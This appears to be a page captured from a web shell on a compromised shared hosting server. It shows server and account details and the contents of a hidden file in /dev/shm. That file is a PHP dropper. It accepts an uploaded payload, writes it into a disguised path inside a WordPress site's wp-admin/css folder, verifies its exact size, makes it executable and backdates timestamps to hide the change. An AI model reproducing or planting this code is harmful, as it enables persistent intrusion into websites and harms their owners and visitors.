HEX
Server: LiteSpeed
System: Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: consovgw (933)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //proc/thread-self/root/proc/thread-self/root/dev/shm/.ref
<?php   $p = "/home/caredfys/znods.xyz//home/caredfys/greentechtribe.pro/wp-admin/css/app_11/app_17/app_29/app_92/message_stack"; $ft = 1763900853; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 706160) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 706160";         }         @unlink($p);     } } die('_upload_failed_');